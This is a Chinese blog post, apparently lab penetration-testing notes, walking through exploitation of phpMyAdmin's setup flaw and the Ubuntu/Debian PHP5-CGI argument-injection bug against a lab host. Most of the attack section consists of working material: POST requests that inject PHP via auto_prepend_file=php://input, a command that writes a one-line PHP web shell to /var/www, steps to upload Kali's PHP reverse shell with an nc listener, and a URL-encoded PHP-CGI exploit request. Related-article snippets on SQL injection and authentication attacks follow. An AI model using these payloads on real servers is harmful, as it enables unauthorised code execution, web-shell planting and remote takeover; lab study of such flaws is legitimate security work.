【渗透测试笔记】之【手动漏洞挖掘一】

最新推荐文章于 2024-08-20 10:05:31 发布
最新推荐文章于 2024-08-20 10:05:31 发布
阅读量807 收藏 6
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107161929
版权
本文详细介绍了如何利用phpMyAdmin的setup漏洞,通过配置漏洞执行PHP代码,进一步执行系统命令,植入WebShell,以及如何利用此Shell执行远程命令和反弹Shell。文章还展示了如何利用Ubuntu/Debian的PHP5-cgi漏洞。
摘要由CSDN通过智能技术生成

phpMyAdmin/setup漏洞

写入WebShell

利用php配置漏洞,执行php代码进而执行系统命令
(可利用Burpsuite发送POST)

POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.2.101
Content-Length: 34

<?php
passthru('id');
die();
?>

在这里插入图片描述
将执行命令替换为

passthru('ls /var/www');

查看www网站下的资源
在这里插入图片描述
写入WebShell

passthru('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/1.php');

反斜杠为转义字符
在这里插入图片描述
查看是否上传成功

passthru('ls /var/www');

在这里插入图片描述
写入成功
检查上传文件的内容

passthru('cat /var/www/1.php');

在这里插入图片描述
发现内容无误
访问该页面并执行系统命令

192.168.2.101/1.php?cmd=id

在这里插入图片描述
Shell执行成功

写入反弹Shell

kali自带PHP反弹Shell:

/usr/share/webshells/php/php-reverse-shell.php

拷贝到桌面

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/2.php

编辑配置

vi 2.php

将反弹IP给为本机IP
在这里插入图片描述
也可以改反弹端口,保存退出
使用nc侦听1234端口:

nc -nvvlp 1234

在这里插入图片描述
上传反弹shell
在这里插入图片描述
捕获shell
在这里插入图片描述

Ubuntu/Debian默认安装PHP5-cgi漏洞

可直接访问/cgi-bin/php5和/cgi-bin/php
提交漏洞代码

POST 
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 192.168.2.101
 
<?php
echo system('id');
die();
?>
AA8j
关注
专栏目录
漏洞挖掘】——141、 逻辑漏洞之身份验证汇总
Fly_鹏程万里
07-26 158
身份验证是网站必不可少的一项业务功能设计,而身份验证机制的选择和设计也会带来诸多的安全问题,在本篇文章中我们将介绍网站使用的身份验证机制以及这些验证机制中存在的安全漏洞并对一些安全防护机制和设计中存在的缺陷和绕过方式进行简易的刨析和演示,同时会对不同身份验证机制中存在的固有安全漏洞进行分析,最后我们会介绍如何使身份验证机制尽可能安全的方法。
Kali linux 学习笔记(四十六)Web渗透——漏洞挖掘之身份认证 2020.3.23
闵行小鱼塘
03-23 513
本节学习挖掘身份认证的漏洞
手动漏洞挖掘-SQL注入小谈
含笑
04-25 7729
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 服务器端程序将用户输入参数做为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数
手动渗透测试漏洞
weixin_34082789的博客
09-18 318
1. 实验环境的叙述性说明   做实验的攻击,以前我已经介绍了一篇文章Kioptrix安装和网络无人驾驶飞机配置。现在看一下虚拟机所需的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑例如以下图所看到的:    2. 列举服务   首先我们使用nmap命令对网络中的机器进行扫描。输入下面命令对192.168.50.0...
针对thinkphp站点的漏洞挖掘和经验分享
最新发布
2301_80127209的博客
08-20 1006
目前在学习和研究thinkphp相关漏洞的打法,然后最近对于thinkphp资产的收集方面有了一个简单的认识,然后写一篇新手看的thinkphp相关的漏洞收集和挖掘的文章来分享下。然后后面是给师傅们分享下后台文件上传,然后直接打一个getshell的漏洞点。
2.手动挖掘漏洞,详细解说,明实验和使用
qq_41860876的博客
09-16 806
任务086:手动漏洞挖掘(二) 这个是我的看的教程的笔记。 里面是我自己实验的照片。 挖掘漏洞原则 挖掘漏洞原则是非常非常重要的 1.1.所有的变量 所有的变量都要去尝试,用各种各样的注入攻击手段尝试每一个变量每一个可以提交的数据的位置都要去尝试提交注入 1.2.所有的头 还要关住HTTP的头也是可以注入信息也可以完成相应的注入应为头也可以判断一个条件 重定要关注cookie(苦k) 1.3....
手动挖掘漏洞(二)目录遍历,文件包含
weixin_30337251的博客
07-08 253
在进行漏洞观察时候,一个是要观察页面上的敏感信息(php=,file=),二个是观察网页url地址,例如: page遍历等于一个重定向页面,如果我们进行修改: 加入../../../../etc/passwd,让他跳转至根目录,在跳转至我们的目的文件: 或者我们直接填写:/etc/passwd : 效果一样 或者可以进行file:///etc/passwd 以...
手动漏洞挖掘-SQL注入(安全笔记)
weixin_30338743的博客
03-30 250
substring_index(USER(),"@",l)-- #是将查询出来的结果进行切分,以@符号的方式切分 ’ union select table_name,table_schema from information_schema.tables-- + #查询数据库中所有的库表    查询所有数据库,数据表: http://192.168.100.129/...
渗透测试学习笔记
Tom197的博客
06-08 1506
2.子域名查询 3.NDS2IP 查询IP,可以通过ping域名方式获得。 站长之家也可以获得,得到IP更详细,通过不同服务器访问,得到大致位置。 nslookup 域名 dig 域名 dnsenum 域名 4.nmap测试 测试服务器所在局域网情况(服务器有哪些设备,开放了什么端口端口),防止一台服务器被攻陷,再延续到局域网其他服务器,nmap -sp 地址。 nmap -O 查询这一网络中每一台设备是什么系统 。AWVS ——new scan 输入网站地址,得到所有漏洞的信息,点击相应漏洞,右侧出
渗透测试实战指南笔记
weixin_67830340的博客
04-07 2051
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
CTF内网渗透笔记
qq_26579613的博客
11-10 4022
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战
自动化测试馆长
03-05 8686
前几天在对某一个站点进行信息搜集的时候,在C段(同网段如192.168.1-255中所有ip)的信息里面发现了某一个站点,当时看见了:
1.手动挖掘漏洞,详细解说,明实验和使用 (身份验证)
qq_41860876的博客
09-14 920
任务086:手动漏洞挖掘(二) 这个是我的看的教程的笔记 身份认证 1.常用弱口令/基于字典密码爆破 2.账号锁定 3.信息收集 手机号 密码错误提示 4.密码嗅探 常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456 账号锁定就是连续密码错误就不在登陆了 信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...
手动检测网站的SQL注入漏洞
weixin_34408717的博客
10-25 1433
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正...
Web漏洞手动检测分析
花有重开日,人无再少年。
06-09 1361
1、了解常见Web漏洞及攻击原理。 2、了解Burp Suite的基本功能及Proxy功能。
手工挖掘web常见漏洞时的一些经验总结
weixin_30314813的博客
05-31 436
一、前提: 漏洞挖掘原则 所有变量 所有头 cookie中的变量 逐个变量删除 漏洞的本质 数据与指令的混淆 对用户输入信息过滤不严判断失误,误将数据当指令 二、经典漏洞: 1、身份认证 常用弱口令/基于字典的密码爆破 锁定账号 信息收集 手机号(通常有以手机号为用户名的...
渗透测试笔记】之【SQL手动漏洞挖掘
AA8j的博客
07-19 413
判断是否存在SQL注入漏洞 假如网址为http://www.xxx.com/1.php?id=1 基于报错检测 http://www.xxx.com/1.php?id=1' http://www.xxx.com/1.php?id=1" http://www.xxx.com/1.php?id=1% http://www.xxx.com/1.php?id=1( http://www.xxx.com/1.php?id=1) 基于布尔检测 http://www.xxx.com/1.php?id=1' an
小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
ZiXuanFY的博客
10-21 5538
手动漏洞挖掘 即扫描后,如何对发现的漏洞告警进行验证。 #默认安装 流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。 漏洞类型--远程命令执行 1、phpMyadmin 安装在web服务器中的web接口,专门用来管理MySQL数
kali渗透学习-web渗透手动漏洞挖掘(二)
weixin_43239236的博客
01-23 278
手动漏洞挖掘原则 1.每一个变量都进行尝试 2.所有头【如:cookie中的变量】 3.逐个变量删除,然后发送测试查看页面的返回结果是不是有差别,有差别则是有影响的变量参数可以以进一步的测试利用 突破身份认证 1、常用弱口令/基于字典的密码爆破 2、手工猜测,若无锁定机制,则进行爆破 3、信息收集【分站上信息收集,猜测账号密码,如:用户光荣榜等。这是进一步的缩减密码破解范围,减少密码破解难度】 手机号:对于隐藏部分的手机号,猜测其确切账号(手动输入,已知手机号,观察密码错误提示信息【如:用户名有误】,则爆破
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值